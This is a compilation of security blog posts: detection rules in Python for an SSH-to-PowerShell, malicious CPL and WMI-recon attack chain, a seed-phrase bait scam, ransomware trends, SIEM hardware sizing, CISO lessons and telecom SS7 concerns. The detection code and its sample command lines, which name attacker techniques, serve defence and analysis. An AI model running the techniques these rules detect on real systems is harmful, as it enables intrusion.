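            and re.search(r"\.cpl\b", ev.command_line, re.IGNORECASE) is not None
            and USER_WRITABLE_RE.search(ev.command_line) is not None)


def wmi_system_recon(ev: ProcessEvent) -> bool:
    """System-information collection through WMI from PowerShell or wmic (step 3 above)."""
    return (_basename(ev.image) in POWERSHELL | {"wmic.exe"}
            and WMI_RECON_RE.search(ev.command_line) is not None)


RULES = {
    "ssh_launches_powershell": ssh_launches_powershell,
    "cpl_from_user_writable_path": cpl_from_user_writable_path,
    "wmi_system_recon": wmi_system_recon,
}


def detect(events):
    """Return (rule name, command line) for every event a rule matches, in event order."""
    return [(name, ev.command_line)
            for ev in events for name, rule in RULES.items() if rule(ev)]


# Constructed events (not from the ANY.RUN session); paths and file names are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\OpenSSH\ssh.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell.exe -NoProfile -Command "<next-stage script>"'),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\control.exe",
                 r"control.exe C:\Users\victim\AppData\Local\Temp\update.cpl"),
    ProcessEvent(r"C:\Windows\System32\control.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell.exe -Command "Get-WmiObject Win32_ComputerSystem"'),
    # Benign: an admin script started from Explorer, and a built-in CPL from System32.
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -File C:\Scripts\backup.ps1"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\control.exe",
                 r"control.exe C:\Windows\System32\timedate.cpl"),
]

if __name__ == "__main__":
    for name, cmd in detect(SAMPLE_EVENTS):
        print(f"{name}: {cmd}")
```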

For the details, read our blog post, view the analysis session in our sandbox, and dive deeper with TI Lookup. Use the search query with the name of the threat and the path to one of the malicious files used in the attack.

About ANY.RUN  

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.  

With ANY.RUN you can: 

  • Detect malware in seconds
  • Interact with samples in real time
  • Save time and money on sandbox setup and maintenance
  • Record and study all aspects of malware behavior
  • Collaborate with your team 
  • Scale as you need

The post 5 Major Cyber Attacks in December 2024 appeared first on ANY.RUN’s Cybersecurity Blog.

Crypto scam: seed phrases shared publicly | Kaspersky official blog

“I have a question. I have USDT stored in my wallet, and I have the seed phrase. How to transfer my funds to another wallet?” — we found a comment like this under a finance-related video on YouTube. And the seed phrase was revealed in full in the comment.

This looked suspicious: even a complete cryptocurrency beginner should know better than to share their seed phrase with the entire world. We were wary, and for a good reason — this comment turned out to be a scam.

Keep reading to find out what can go wrong if you somehow come across someone’s seed phrase…

“I give you the seed phrase, and you help me transfer my money to another wallet”

Let’s start with the basics. A seed phrase is a randomly generated unique sequence of dictionary words that together form a phrase needed to recover access to a cryptowallet. When someone shares their seed phrase — essentially the key to their wallet — it looks extremely suspicious. We then discovered similar comments, each containing the same recovery phrase and a request for help transferring funds to another platform. Notably, all these messages were posted from newly created accounts.

In similar comments written from newly created accounts, supposedly “crypto newbies” generously share their seed phrases

Now, let’s imagine for a second that someone reading one of these comments is a little unscrupulous and, instead of helping the newbie, decides to take a peek inside the wallet (after all, they have the key). Upon opening the wallet, they’re pleasantly surprised to find it stuffed with USDT: a TRC20 token on the TRON network tied to the value of the US dollar. The wallet contains the equivalent of eight thousand dollars. Well, what to do next? The correct answer would be to remember that there’s no such thing as a free lunch, and steer well clear of the wallet.

Finding several thousand US dollars in someone else’s wallet looks like a lucky chance to get rich for an immoral person

However, the scam assumes that our nefarious passerby will want to appropriate all or at least part of the cryptocurrency. But to withdraw USDT, a small fee must be paid in another currency: TRX (the TRON cryptocurrency token). Unfortunately, the wallet doesn’t have enough TRX, so the thief tries to transfer TRX from their own personal wallet — only to discover that the tokens they transferred immediately ended up in a completely different, third wallet.

The list of transactions details the scammers’ earnings

The catch is that the bait is set up as a multi-signature wallet. To authorize outgoing transactions in such wallets, approval from two or more people is required, so transferring USDT to a personal wallet won’t work — even after paying the “commission”.

So, the scammers are impersonating beginners who foolishly share access to their cryptowallets, tricking equally naive thieves — who end up becoming the victims. In this scenario, the scammers are something like digital Robin Hoods, as the scheme primarily targets other crooked individuals. But this twist is nothing new — we’ve previously covered a much more elegant crypto fraud scheme, also aimed at unprincipled people.

How to protect yourself from crypto scams

The way to protect against the above-described scam is quite simple: just be a decent person and don’t try to get into other people’s cryptowallets — even if the seed phrase is left in the comments of your favorite YouTube channel or even slipped under your front door.

In all other cases, crypto asset owners can follow these universal tips and recommendations:

  • Learn about the latest scams aimed at stealing cryptocurrency to stay aware of current trends.
  • Secure your devices with reliable protection.
  • Double-check any information received from strangers: scammers can pose either as beginners in the crypto world or as experienced trading sharks.

Top 10 Ransomware Trends Observed in 2024: A Look Ahead to 2025

Ransomware attacks have evolved into one of the most significant threats to global cybersecurity. These attacks have shifted from mere opportunistic schemes to advanced operations targeting businesses, critical infrastructure, and even governments. The year 2024 saw ransomware actors innovating at an unprecedented pace, leveraging new technologies and tactics to inflict maximum damage.

With ransomware incidents causing an average cost of $4.54 million per breach—excluding ransom payments—it is imperative for organizations to stay informed and prepared.

This article delves into the top 10 ransomware trends observed in 2024 and provides predictions for what lies ahead in 2025.

1. Double and Triple Extortion Schemes

In 2024, ransomware actors moved beyond simple file encryption to adopt double and triple extortion tactics. These methods involve not only encrypting a victim’s data but also exfiltrating it and threatening to release it publicly unless a ransom is paid. Triple extortion adds another dimension: threatening to disrupt business operations or targeting customers and third parties associated with the victim.

  • Example: A leading healthcare provider in the U.S. fell victim to a triple extortion scheme where attackers encrypted sensitive patient records, exfiltrated the data, and launched Distributed Denial of Service (DDoS) attacks until the ransom was paid. This resulted in financial losses and severe reputational damage.

Prediction for 2025: Expect these multi-layered extortion methods to become the norm as attackers seek greater leverage and higher payouts. Organizations will need to strengthen their data security measures and incident response plans to mitigate these risks.

2. Ransomware-as-a-Service (RaaS) Proliferation

The Ransomware-as-a-Service (RaaS) model gained significant traction in 2024, enabling even low-skilled cybercriminals to launch ransomware attacks. Under this model, ransomware developers provide affiliates with ready-to-use tools and infrastructure in exchange for a share of the profits.

  • Example: Groups like LockBit, BlackCat, and Play have turned RaaS into a booming industry, offering technical support, user manuals, and even marketing strategies to affiliates.

Prediction for 2025: The RaaS ecosystem will expand further, with more criminal groups entering the market. This will likely result in a surge in ransomware incidents targeting small and medium-sized businesses (SMBs) that lack advanced cybersecurity defenses.

3. Data Exfiltration as a Standard Tactic

Stealing sensitive data before encrypting systems has become a standard tactic in ransomware operations. This not only increases the ransom demand but also amplifies the reputational and regulatory consequences for victims.

  • Example: In 2024, a global financial institution faced a ransomware attack where attackers exfiltrated millions of customer records. The breach led to legal consequences and a loss of customer trust, despite the organization’s efforts to recover.

Prediction for 2025: With stricter data privacy regulations like GDPR and CCPA, data exfiltration attacks will pose an even greater risk. Organizations will need to implement stronger encryption and data loss prevention (DLP) solutions to counteract these threats.

4. Zero-Day Exploits and Advanced Phishing

Ransomware groups are increasingly using zero-day vulnerabilities and highly targeted phishing campaigns to gain initial access to victim networks.

  • Example: In 2024, a large technology company was breached when employees fell for an advanced phishing email disguised as a legitimate communication from a trusted vendor. The attackers exploited a zero-day vulnerability to deploy ransomware, causing significant operational downtime.

Prediction for 2025: As more organizations adopt digital transformation initiatives, the attack surface for ransomware groups will expand. Expect more zero-day exploits and socially engineered phishing campaigns aimed at high-value targets.

5. Living Off the Land (LotL) Techniques

Ransomware actors are employing Living Off the Land (LotL) techniques to evade detection by using legitimate tools and processes already present in the victim’s network.

  • Example: In a 2024 attack on a healthcare organization, attackers used PowerShell and Remote Desktop Protocol (RDP) to move laterally within the network without triggering traditional security alarms.

Prediction for 2025: LotL techniques will become more prevalent, making it essential for organizations to implement advanced endpoint detection and response (EDR) solutions and conduct regular audits of privileged accounts.

6. Critical Infrastructure as a Prime Target

Critical infrastructure sectors, including healthcare, energy, and government, have become top targets for ransomware groups. These sectors often lack strong cybersecurity defenses, making them vulnerable to attacks with far-reaching consequences.

  • Example: In 2024, a North American energy provider suffered a ransomware attack that caused widespread power outages and operational disruptions.

Prediction for 2025: With geopolitical tensions on the rise, ransomware attacks on critical infrastructure are expected to increase. Governments and private sectors will need to collaborate on improving the resilience of these essential systems.

7. Industrial Ransomware Targeting Manufacturing

The manufacturing and industrial sectors have seen a rise in ransomware attacks, disrupting production lines and supply chains.

  • Example: In 2024, a global automotive manufacturer was hit by ransomware that halted production for weeks, leading to millions in losses and delayed product deliveries.

Prediction for 2025: As industrial control systems (ICS) and IoT devices become more interconnected, ransomware targeting these environments will grow. Organizations must prioritize securing operational technology (OT) networks.

8. Decline in Average Ransom Payment but Higher Incident Costs

While the average ransom payment dropped from $850,000 to $569,000 in 2024, the overall cost of ransomware incidents has risen due to operational disruptions, data recovery expenses, and reputational damage.

  • Example: A mid-sized retail company paid a lower ransom in 2024 but incurred over $3 million in total costs due to lost sales, customer churn, and recovery efforts.

Prediction for 2025: Organizations may see lower ransom demands, but the indirect costs of ransomware attacks will continue to climb. This highlights the importance of proactive defenses and comprehensive incident response plans.

9. Evolving Ransomware Variants

New ransomware variants with enhanced capabilities emerged in 2024, including Akira and BlackCat, which feature advanced encryption and stealth techniques.

  • Example: Akira ransomware targeted a European bank, using multi-layered encryption that rendered recovery nearly impossible without paying the ransom.

Prediction for 2025: Ransomware variants will continue to evolve, focusing on bypassing traditional defenses and targeting cloud environments and hybrid work setups.

10. Increased International Collaboration and Crackdowns

Law enforcement agencies and cybersecurity organizations have intensified their efforts to combat ransomware through international collaboration. In 2024, several high-profile ransomware groups were dismantled, and stolen funds were recovered.

  • Example: A joint operation by the FBI and Europol in 2024 disrupted a major ransomware operation, recovering $20 million in ransom payments.

Prediction for 2025: While these crackdowns are promising, ransomware groups will adapt and find new ways to evade law enforcement. Continued international collaboration will be critical to countering these threats.

Looking Ahead to 2025

As we move into 2025, the ransomware landscape will continue to evolve. Here are some key predictions:

  1. AI-Powered Ransomware: Attackers will leverage artificial intelligence to automate ransomware campaigns and improve phishing success rates.
  2. Focus on Cloud Environments: With more businesses migrating to the cloud, ransomware groups will target cloud-native applications and services.
  3. Stricter Regulations: Governments will implement more stringent reporting and compliance requirements for ransomware incidents.
  4. Cyber Insurance Challenges: The cost of cyber insurance will rise, with stricter conditions for coverage related to ransomware.
  5. Post-Attack Recovery Services: Organizations will invest more in post-attack recovery services, such as takedown solutions and data restoration.

To Sum Up

The ransomware trends of 2024 highlight threat actors’ adaptability and ingenuity. To stay ahead of these evolving threats, organizations must adopt a proactive approach, including strong cybersecurity measures, employee awareness programs, and collaborative efforts with industry peers and law enforcement.

By understanding the tactics and strategies employed by ransomware groups, businesses can better prepare for the challenges that lie ahead in 2025 and beyond.

Source:

https://cyble.com/knowledge-hub/ransomware-tactics-adopted-by-threat-actors-in-2024/

https://www.statista.com/topics/4136/ransomware/#topicOverview

Monthly Ransomware Threat Intelligence 2027.pdf

The post Top 10 Ransomware Trends Observed in 2024: A Look Ahead to 2025 appeared first on Cyble.

Hardware for SIEM systems | Kaspersky official blog

At some point, the information security department of any large company inevitably begins to consider introducing a SIEM system — or replacing the existing one, and must therefore estimate the budget required for its deployment. But SIEM isn’t a lightweight product that can be deployed within existing infrastructure. Almost all solutions in this category require additional hardware, meaning that equipment must be purchased or rented.

So, for accurate budgeting, it’s necessary to take into account the expected hardware configuration. In this post, we discuss how SIEM hardware requirements change depending on the company’s profile and system’s architecture, and provide rough parameters to help estimate the preliminary cost of such equipment.

Evaluating the data flow

Essentially, a SIEM system collects event data from internal and external sources and identifies security threats by correlating this data. Therefore, before considering what hardware will be required, it’s essential to first assess the volume of information the system will process and store. To this end, you need to first identify critical risks to the infrastructure, and then determine the data sources that must be analyzed to help detect and address threats related to these risks. These are the data sources to focus on. Such an assessment is necessary not only to determine the required hardware, but also to estimate the cost of licensing. For example, the cost of licensing for our Kaspersky Unified Monitoring and Analysis Platform SIEM system directly depends on the number of events per second (EPS). Another important aspect is to check how the vendor calculates the number of events for licensing. In our case, we take the events per second after filtering and aggregation, calculating the average number of events over the past 24 hours rather than their peak values — but not all vendors follow this approach.

The most common sources include endpoints (Windows events, Sysmon, PowerShell logs, and antivirus logs), network devices (firewalls, IDS/IPS, switches, access points), proxy servers (such as Squid and Cisco WSA), vulnerability scanners, databases, cloud systems (such as AWS CloudTrail or Office 365), and infrastructure management servers (domain controllers, DNS servers, and so on).

As a rule, to form preliminary expectations about the average event flow, the size of the organization can serve as a guide. However, the architectural particularities of specific IT infrastructure can make company size a less decisive parameter.

In general, for small and medium-sized organizations with just one office — or up to several offices with good communication channels among them and IT infrastructure located in a single data center — an average event flow of 5000–10 000 EPS can be expected. For large companies, making an estimate is more challenging: depending on the complexity of the infrastructure and the presence of branches, the flow can range from 50 000 to 200 000 EPS.

Architectural components of an SIEM system

An SIEM system generally consists of four main components: the management subsystem, event collection subsystem, correlation subsystem, and storage subsystem.

Core (management subsystem). You can think of this as the control center of the system. It allows managing the other components, and provides visualization tools for SOC analysts — enabling them to easily configure operational parameters, monitor the SIEM system’s state, and, most importantly, view, analyze, sort and search events, process alerts, and work with incidents. This control center needs to also support log viewing through widgets and dashboards, and enable quick data search and access.

The core is an essential component and can be installed as a single instance or as a cluster to provide a higher level of resilience.

Event collection subsystem. As the name suggests, this subsystem collects data from various sources and converts it into a unified format through parsing and normalization. To calculate the required capacity of this subsystem, one must consider both the event flow intensity and the log format in which events arrive from sources.

The server load depends on how the subsystem processes logs. For example, even for structured logs (Key Value, CSV, JSON, XML), you can use either regular expressions (requiring significantly more powerful hardware) or the vendor’s built-in parsers.

Correlation subsystem. This subsystem analyzes data collected from logs, identifies sequences described in correlation rule logic, and, if necessary, generates alerts, determines their threat levels, and minimizes false positives. It’s important to remember that the correlator’s load is determined not only by the event flow but also by the number of correlation rules and the methods used to describe detection logic.

Storage subsystem. An SIEM system must not only analyze but also store data for internal investigations, analytics, visualization and reporting, and in certain industries — for regulatory compliance and retrospective alert analysis. Thus, another critical question at the SIEM system design stage is how long you want to store collected logs. From an analyst’s perspective, the longer the data is stored, the better. However, a longer log retention period increases hardware requirements. A mature SIEM system provides the ability to strike a balance by setting different retention periods for different log types. For example, 30 days for NetFlow logs, 60 days for Windows informational events, 180 days for Windows authentication events, and so on. This allows data to be optimally allocated across available server resources.

It’s also important to understand what volume of data will be stored using hot storage (allowing quick access) and cold storage (suitable for long-term retention). The storage subsystem must offer high performance, scalability, cross-storage search capabilities (both hot and cold), and data viewing options. Additionally, the ability to back up stored data is essential.
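An added sizing sketch (not Kaspersky's calculator) that puts two points from this section into code: the licensed EPS computed as a 24-hour average of the post-filter flow rather than its peak, and storage under the per-type retention example above (30 days NetFlow, 60 days Windows informational, 180 days Windows authentication) with a hot/cold split. The per-event byte sizes and the day of traffic are assumed, constructed values.

```python
import math
from dataclasses import dataclass

SECONDS_PER_DAY = 86_400
TB = 10**12  # decimal terabyte, the unit in which the configurations below quote disk space


@dataclass(frozen=True)
class LogSource:
    name: str
    eps: float            # average events per second after filtering and aggregation
    stored_bytes: int     # assumed on-disk bytes per event after normalisation and compression
    retention_days: int   # per-type retention, as in the 30/60/180-day example above


def licensed_eps(per_second_counts, filtered_fraction=0.0):
    """EPS as the post says it is licensed: the 24-hour average of the flow that
    survives filtering, returned next to the peak so the difference is visible."""
    kept = [count * (1.0 - filtered_fraction) for count in per_second_counts]
    return math.fsum(kept) / len(kept), max(kept)


def source_bytes(src: LogSource, days=None) -> float:
    """Bytes a source occupies on disk for `days` (default: its own retention)."""
    if days is None:
        days = src.retention_days
    return src.eps * src.stored_bytes * SECONDS_PER_DAY * days


def total_storage_tb(sources, uniform_days=None) -> float:
    """Storage for all sources; pass uniform_days to see what a single retention costs."""
    return sum(source_bytes(s, uniform_days) for s in sources) / TB


def tiered_storage_tb(sources, hot_days: int):
    """Split each source's retention into hot (first hot_days) and cold (remainder) storage."""
    hot = cold = 0.0
    for src in sources:
        days_hot = min(src.retention_days, hot_days)
        hot += source_bytes(src, days_hot)
        cold += source_bytes(src, src.retention_days - days_hot)
    return hot / TB, cold / TB


# Constructed sources; the byte sizes are assumptions, not vendor figures.
SAMPLE_SOURCES = [
    LogSource("NetFlow", 3000, 120, 30),
    LogSource("Windows informational events", 1500, 250, 60),
    LogSource("Windows authentication events", 500, 250, 180),
]
# One constructed day of raw per-second counts: 5000 EPS with a one-hour burst to 12500.
SAMPLE_DAY = [5000] * (SECONDS_PER_DAY - 3600) + [12500] * 3600

if __name__ == "__main__":
    avg, peak = licensed_eps(SAMPLE_DAY, filtered_fraction=0.2)
    print(f"licensed EPS {avg:.0f} (peak after filtering {peak:.0f})")
    print(f"per-type retention: {total_storage_tb(SAMPLE_SOURCES):.2f} TB")
    print(f"flat 30 days:       {total_storage_tb(SAMPLE_SOURCES, 30):.2f} TB")
    hot, cold = tiered_storage_tb(SAMPLE_SOURCES, hot_days=7)
    print(f"hot {hot:.2f} TB / cold {cold:.2f} TB")
```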

Architectural features of Kaspersky SIEM

So, we’ve laid out the ideal requirements for an SIEM system. It probably won’t surprise you that our Kaspersky Unified Monitoring and Analysis Platform meets these requirements. With its built-in capability to scale for data flows reaching hundreds of thousands of EPS within a single instance, our SIEM system isn’t afraid of high loads. Importantly, it doesn’t need to be split into multiple instances with correlation results reconciled afterwards — unlike many alternative systems.

The event collection subsystem of the Kaspersky Unified Monitoring and Analysis Platform system is equipped with a rich set of parsers optimized for processing logs in each format. Additionally, the multi-threading capabilities of Go mean the event flow can be processed using all available server resources.

The data storage subsystem used in our SIEM system consists of servers that store data, and servers with the clickhouse-keeper role, which manage the cluster (these servers don’t store data themselves but facilitate coordination among instances). For data flows of 20 000 EPS with a relatively low number of search queries, these services can operate on the same servers that store the data. For higher data flows, it’s recommended to separate these services. For instance, they can be deployed on virtual machines (a minimum of one is required, though three are recommended).

The Kaspersky Unified Monitoring and Analysis SIEM storage system is flexible — allowing event flows to be distributed across multiple spaces, and specifying the storage depth for each space. For example, inexpensive disks can be used to create cold storage (where searches are still possible, just slower). This cold storage can house data that is unlikely to require analysis but must be stored due to regulatory requirements. Such information can be moved to cold storage literally the day after it’s collected.

Thus, the data storage approach implemented in our SIEM system enables long-term data retention without exceeding the budget on expensive equipment, thanks to hot and cold storage capabilities.

SIEM architecture deployment using our SIEM as an example

The Kaspersky Unified Monitoring and Analysis Platform supports multiple deployment options, so it’s important first to determine your organization’s architecture needs. This can be done based on the estimated EPS flow, and the particularities of your company. For simplicity, let’s assume the required data retention period is 30 days.

Data flow: 5000–10 000 EPS

For a small organization, the SIEM system can be deployed on a single server. For example, our SIEM system supports the All-in-One installation option. In this case, the required server configuration is 16 CPUs, 32GB of RAM, and 2.5TB of disk space.

Data flow: 30 000 EPS

For larger organizations, separate servers are needed for each SIEM component. Dedicating a server exclusively for storage ensures that search queries don’t affect the processing of events by the collector and correlator. However, the collector and correlator services can still be deployed together (or separately, if desired). An approximate equipment configuration for this scenario is as follows:

  • Core: 10 CPUs, 24GB of RAM, 0.5TB of disk space
  • Collector: 8 CPUs, 16GB of RAM, 0.5TB of disk space
  • Correlator: 8 CPUs, 32GB of RAM, 0.5TB of disk space
  • Storage: 24 CPUs, 64GB of RAM, 14TB of disk space

Data flow: 50 000–200 000 EPS

For large enterprises, additional factors must be considered when defining the architecture. These include ensuring resilience (as the substantial data-flow increases the risk of failure) and the presence of company divisions (branches). In such cases, more servers may be required to install the SIEM system, as it’s preferable to distribute collector and correlator services across different servers for such high EPS flows.

Data flow: 200 000 EPS

As EPS flows grow and the infrastructure divides into separate independent units, the amount of equipment required increases accordingly. Additional servers will be needed for collectors, storage, correlators, and keepers. Moreover, in large organizations, data availability requirements may take precedence. In this case, the Kaspersky Unified Monitoring and Analysis Platform storage cluster divides all collected events into shards. Each shard consists of one or more data replicas. And each shard replica is a cluster node, meaning a separate server. To ensure resilience and performance, we recommend deploying the cluster with two replicas per shard. For processing such large EPS volumes, three collector servers may be required, installed in the offices with the highest event flows.

Kaspersky SIEM in holding companies

In large enterprises, the cost of implementing an SIEM system increases not only with the volume of data, but also depending on the usage profile. For example, in some cases (such as MSP and MSSP environments, as well as large holding companies with multiple subsidiaries or branches), multi-tenancy is required. This means the company needs to maintain multiple “mini-SIEMs”, which operate independently. Our solution enables this through a single installation at the head office, without the need to install separate systems at each branch or tenant. This significantly reduces equipment costs.

SIEM scheme

Let’s imagine either (i) a holding company, (ii) a vertically-integrated enterprise, or (iii) a geographically-distributed corporation with either various independent security teams or a need to isolate data access among branches. The Kaspersky Unified Monitoring and Analysis Platform tenant model allows for segregated access to all resources, events, and third-party integration settings. This means one installation functions as multiple separate SIEM systems. In this case, while each tenant can develop its own content (correlation rules), there’s also the option of distributing a unified set of resources across all divisions. In other words, each division can have its own collectors, correlators, and rules, but the HQ security team can also assign standardized bundles of security content for everyone — ensuring consistent protection across the organization.

SIEM in holding

Thus, using the Kaspersky Unified Monitoring and Analysis Platform ensures the necessary performance with relatively modest computing resources. In some cases, savings on hardware can reach up to 50%.

For a more accurate understanding of the required resources and implementation costs, we recommend talking with our specialists or integration partners. We (or our partners) can also provide premium support, assist in developing additional integrations (including using API capabilities for connected products), and oversee the deployment of a turnkey solution covering system design, equipment estimation, configuration optimization, and much more. Learn more about our SIEM system, the Kaspersky Unified Monitoring and Analysis Platform, on the official product page.

Top 5 Lessons for CISOs and Cybersecurity Professionals from 2024

The year 2024 has been a rollercoaster for cybersecurity professionals worldwide. From ransomware attacks paralyzing critical industries to insider threats causing massive data breaches, the challenges for Chief Information Security Officers (CISOs) and cybersecurity teams have been relentless. These cyberattacks and data breaches highlight the importance of adapting strategies and learning from past events to secure organizations better as cyber threats evolve. 

Here are the top five lessons that CISOs and cybersecurity professionals should carry forward as 2025 begins.

Lessons from 2024 that CISOs Must Carry Forward 

1. Human Error Remains the Biggest Cyber Vulnerability 

A staggering 84% of CISOs in countries like Saudi Arabia, Canada, France, and South Korea identified human error as their organization’s greatest cybersecurity weakness in 2024. This vulnerability extends to phishing attacks, misconfigurations, poor credential management, and insider threats. 

Case in Point: The Star Health Insurance Breach 

In August 2024, India’s largest health insurer, Star Health, suffered a data breach exposing millions of customer medical reports and personal details. The threat actor “xenZen” accused the company’s CISO of insider collusion, sharing a screenshot alleging that credentials were leaked via email. 

This Star Health Insurance data breach highlights two key lessons: 

  • Cybersecurity training needs to go beyond awareness: Employees, especially those handling sensitive data, must undergo regular, scenario-based training. 

  • Strengthen insider threat detection: Advanced monitoring tools and strict access controls can help detect suspicious activities before they escalate into full-blown breaches. 

2. Multi-Factor Authentication (MFA) Is Non-Negotiable 

In 2024, weak or absent MFA emerged as a common denominator in several high-profile breaches. Attackers exploited credential weaknesses to gain access to sensitive systems, causing significant damage. 

Case in Point: The Snowflake Breach 

The U.S.-based cloud storage company Snowflake experienced a breach where compromised credentials—obtained through malware—were used to access sensitive customer data. The lack of MFA enforcement on demo accounts allowed hackers to compromise the data of high-profile clients like TicketMaster and LendingTree.

Lesson Learned: 

  • Implement MFA universally: Every account, internal or external, must have MFA enabled. A single weak link can jeopardize the entire ecosystem. 

  • Enforce credential hygiene: Regularly rotate credentials, monitor for leaked credentials on the dark web, and implement strong password policies. 

3. Ransomware Is Evolving—So Must Your Defenses 

Ransomware attacks continued to dominate headlines in 2024, with 41% of CISOs worldwide naming it a top cybersecurity risk. These attacks increasingly targeted critical infrastructure and essential service providers, making their impact devastating. 

Case in Point: The CDK Global Ransomware Attack 

In June 2024, CDK Global, a software provider for car dealerships, was hit by a ransomware attack that disrupted operations for over 15,000 dealerships. Major companies like Asbury Automotive and Lithia Motors had to revert to manual processes, resulting in financial losses and customer dissatisfaction. 

Lesson Learned: 

  • Strengthen endpoint protection: Implement advanced threat detection tools to identify and stop ransomware before it spreads. 

  • Create robust incident response plans: Include regular, tested backups, tabletop exercises, and rapid recovery procedures to minimize downtime. 

4. The Supply Chain Is a Critical Weak Link

Cybercriminals increasingly exploited vulnerabilities in supply chains, targeting third-party vendors to gain access to larger organizations. 

Case in Point: The Dell Data Breach 

In 2024, Dell confirmed a data breach exposing 49 million customer purchase records. While financial data remained secure, the stolen information was sufficient to launch phishing and smishing attacks. 

Case in Point: The Ascension Health Cyberattack 

A massive cyberattack on Ascension Health disrupted clinical operations, forcing the nonprofit health system to disconnect from some business partners. The attack led to an additional operating loss of $1.8 billion for the fiscal year. 

Lesson Learned: 

  • Conduct thorough vendor risk assessments: Before partnering with third-party vendors, evaluate their cybersecurity posture. 

  • Mandate compliance with security standards: Require vendors to adopt strong security practices like SOC 2 compliance and regular penetration testing. 

5. Customer Trust Is Harder to Rebuild After a Breach

In 2024, cyberattacks had far-reaching consequences beyond direct financial losses. In one survey, 47% of respondents said that attracting new customers became significantly harder after a data breach. 

Case in Point: Change Healthcare (CHC) Ransomware Attack 

In February 2024, Change Healthcare fell victim to a ransomware attack linked to the BlackCat group. With sensitive health data of over 110 million individuals exposed, the incident eroded trust among customers. Despite offering credit monitoring services, the reputational damage proved difficult to mitigate. 

Lesson Learned: 

  • Be transparent and proactive: When breaches occur, communicate quickly, outline steps taken to mitigate the impact, and offer affected customers tangible support. 

  • Invest in brand reputation management: Build a strong security narrative and a culture of trust through certifications, audits, and visible cybersecurity initiatives. 

Actionable Takeaways for CISOs and Cybersecurity Professionals 

As the threat landscape becomes increasingly complex, organizations must adopt a multi-faceted approach to cybersecurity. Incorporating advanced tools and platforms can significantly enhance a CISO’s ability to address modern threats and safeguard the enterprise. 

Tools like Cyble Vision provide a comprehensive suite of capabilities that can empower organizations to identify, monitor, and mitigate threats across their digital footprint. For example: 

  • Attack Surface Management: Proactively identify and mitigate vulnerabilities by gaining a complete view of your organization’s external attack surface. 

  • Brand Intelligence: Protect against online brand abuse, including phishing and fraudulent domains, to safeguard customer trust and your organization’s reputation. 

  • Dark Web Monitoring: Stay ahead of cybercriminals with continuous monitoring of dark web activities, uncovering leaked credentials, sensitive data, and emerging threats. 

  • Cyber Threat Intelligence: Leverage AI-driven insights and continuous monitoring to detect and counteract evolving cyber threats in real time. 

  • Takedown and Disruption Services: Address malicious campaigns effectively by removing fraudulent websites and disrupting attack operations. 

  • Third-Party Risk Management: Identify and mitigate risks from vendors and external collaborators, ensuring security in your business partnerships. 

  • Vulnerability Management: Use advanced scanning and remediation tools to address vulnerabilities before they are exploited. 

These capabilities, combined with features like digital forensics, incident response, and executive monitoring, enable CISOs to adopt a proactive, intelligence-led approach to managing cybersecurity challenges. Solutions like Cyble’s provide the visibility and tools needed to stay ahead of adversaries, reduce exposure, and protect critical assets. 

By integrating such advanced tools into their cybersecurity frameworks, CISOs can not only address existing risks but also build resilience against future threats, ensuring their organization’s digital security is always one step ahead. 

To Sum Up 

The lessons from 2024’s high-profile cyberattacks highlight the need for a shift from reactive to proactive cybersecurity strategies. With 38% of CISOs identifying malware as a top risk and 29% pointing to email fraud and DDoS attacks, it’s clear that the threat landscape continues to evolve at an alarming pace.  

However, as businesses navigate these challenges, the focus must remain on fortifying human and technological defenses, building cyber resilience, and fostering transparency in post-breach communication. 

As organizations worldwide grapple with the dual pressures of digital transformation and escalating cyber threats, the stakes have never been higher. Learning from the mistakes and successes of 2024 will empower CISOs and cybersecurity professionals to build stronger, more adaptive defenses—ensuring not just survival but success in the face of cyber adversity. 

The post Top 5 Lessons for CISOs and Cybersecurity Professionals from 2024 appeared first on Cyble.

Blog – Cyble – Read More

CISA Recommends Encrypted Messaging Apps as Telecom Security Questioned 


The security of U.S. telecom networks has come under fresh scrutiny in recent months, with the latest example coming this week when the Cybersecurity and Infrastructure Security Agency (CISA) recommended that individuals in need of high security use encrypted messaging apps for mobile communications. 

Concern grew in October when CISA and the FBI confirmed that China-linked threat actors had infiltrated telecom networks in an attempt to spy on President-elect Donald Trump and the campaign of Vice President Kamala Harris, among other top U.S. officials. 

Congressional hearings followed, including an extraordinary admission from Senator Mark Warner that “thousands and thousands and thousands” of vulnerable telecom network devices might need to be replaced. 

“Unlike some of the European countries where you might have a single telco, our networks are a hodgepodge of old networks,” Warner told the Washington Post. “The big networks are combinations of a whole series of acquisitions, and you have equipment out there that’s so old it’s unpatchable.” 

Guidance earlier this month from U.S. cyber and national security agencies and counterparts in Canada, Australia and New Zealand offered comprehensive advice for hardening and securing global telecom networks in light of the attacks, and the U.S. Federal Communications Commission (FCC) said it would take steps to mandate stronger telecom security. 

Attention Turns to SS7 and Diameter as List of Attackers Grows 

Recently, the security of the 40-year-old Signaling System No. 7 (SS7) telecom protocols used in 2G and 3G SMS and phone services – as well as international roaming – came under renewed scrutiny over SS7’s potential to allow location tracking, interception of voice data and multi-factor authentication keys, as well as the protocol’s potential as a spyware delivery vector. The 4G and 5G Diameter protocol also has location tracking vulnerabilities, and 4G and 5G users could also find themselves downgraded to SS7 when roaming. 

Senator Ron Wyden earlier this month released 23 pages of correspondence with the U.S. Department of Defense (DoD) detailing insecurities in telecom messaging systems and the SS7 and Diameter protocols. Wyden and Senator Eric Schmitt asked DoD Inspector General Robert Storch to “investigate the Department of Defense’s (DOD) failure to secure its unclassified telephone communications from foreign espionage.” 

“Teams and certain other platforms utilized by DOD are not end-to-end encrypted by default, causing concerning gaps in security that could easily be mitigated,” the Senators wrote. “End-to-end encrypted voice, video, and text messaging tools such as Signal, WhatsApp, and FaceTime better protect communications in the event that the company that offers the service is hacked.” 

